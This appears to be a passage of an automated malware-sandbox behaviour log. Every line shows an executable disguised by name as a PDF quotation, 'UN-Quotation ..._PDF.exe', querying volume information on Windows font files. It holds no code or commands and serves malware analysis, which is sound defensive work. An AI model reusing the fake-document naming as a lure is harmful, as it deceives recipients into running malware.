                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
